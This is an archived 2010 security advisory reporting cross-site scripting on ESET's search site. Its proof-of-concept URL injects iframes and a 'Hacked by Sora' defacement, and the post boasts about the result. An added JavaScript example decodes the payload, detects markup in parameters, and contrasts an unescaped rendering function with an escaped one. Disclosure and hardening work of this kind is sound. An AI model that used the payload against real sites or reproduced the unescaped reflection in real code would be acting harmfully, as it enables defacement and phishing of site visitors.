ESET Cross Site Scripting

2010-01-05T00:00:00
ID PACKETSTORM:84773
Type packetstorm
Reporter Sora
Modified 2010-01-05T00:00:00

Description

                                        
                                            `___________ _______________________________  
\_ _____// _____/\_ _____/\__ ___/  
| __)_ \_____ \ | __)_ | |  
| \/ \ | \ | | http://www.eset.com/  
|  
/_______ /_______ //_______ / |____|  
\/ \/ \/ > Cross Site Scripting Exploit  
> Author: Sora  
> Contact: vhr95zw [at] hotmail [dot] com  
> Website: http://greyhathackers.wordpress.com/  
> Vulnerability: Cross Site Scripting  
  
————————-  
1. INFORMATION |  
————————-  
Site: http://search.eset.com/  
Vulnerability: Cross Site Scripting  
Vulnerability Level: 3  
  
————————-  
2. DESCRIPTION |  
————————-  
  
http://search.eset.com/ suffers from a remote cross-site scripting vulnerability, which can be used to  
scam victims out of information and to execute malicious JavaScript which might remotely download a file to the  
victim's PC.  
  
————————-  
3. PROOF OF CONCEPT |  
————————-  
  
http://search.eset.com/esetsite/index?page=answers&type=%3Ciframe%20src=%22www.google.ca%22%3E&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E&ichbox[]=en-US  
  
Pretty much owned? >:D  
  
————————-  
4. GREETZ |  
————————-  
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #  
  
————————-  
5. CONTACT |  
————————-  
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com  
  
<c> 2010 – http://greyhathackers.wordpress.com – Sora  
  
  
`
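The proof-of-concept URL above places markup in the type and question_box parameters. The following is an added example, not part of the original advisory or ESET's code: it decodes that URL, reports which parameters carry markup, and contrasts an unencoded reflection with an HTML-escaped one. The function names and the page template are assumptions, since the advisory does not show how the site built its response.

```javascript
// Added example; the rendering functions are hypothetical stand-ins, since the
// advisory does not show how search.eset.com built its response.

// Proof-of-concept URL exactly as printed in the advisory.
const POC_URL =
  'http://search.eset.com/esetsite/index?page=answers' +
  '&type=%3Ciframe%20src=%22www.google.ca%22%3E' +
  '&question_box=%3Ch2%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com' +
  '%20-%20greyhathackers.blogspot.com%3C/h2%3E%3Ciframe%20src=%22www.xssed.com%22%3E' +
  '&ichbox[]=en-US';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that are significant in HTML text and attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Names of query parameters whose decoded value contains markup characters.
// Useful as a log-review check for requests like the one in the advisory.
function paramsWithMarkup(rawUrl) {
  const names = [];
  for (const [name, value] of new URL(rawUrl).searchParams) {
    if (/[<>]/.test(value)) names.push(name);
  }
  return names;
}

// Assumed vulnerable pattern: decoded parameters concatenated into the page as-is.
function renderUnsafe(rawUrl) {
  const q = new URL(rawUrl).searchParams;
  return `<p>Type: ${q.get('type') ?? ''}</p><p>Question: ${q.get('question_box') ?? ''}</p>`;
}

// Hardened pattern: every reflected value is HTML-escaped at output time.
function renderSafe(rawUrl) {
  const q = new URL(rawUrl).searchParams;
  return `<p>Type: ${escapeHtml(q.get('type') ?? '')}</p>` +
         `<p>Question: ${escapeHtml(q.get('question_box') ?? '')}</p>`;
}

console.log(paramsWithMarkup(POC_URL));
console.log(renderUnsafe(POC_URL));
console.log(renderSafe(POC_URL));
```

The escaping shown covers values reflected into HTML text or quoted attributes; values reflected into script, URL or CSS contexts need the encoder for that context.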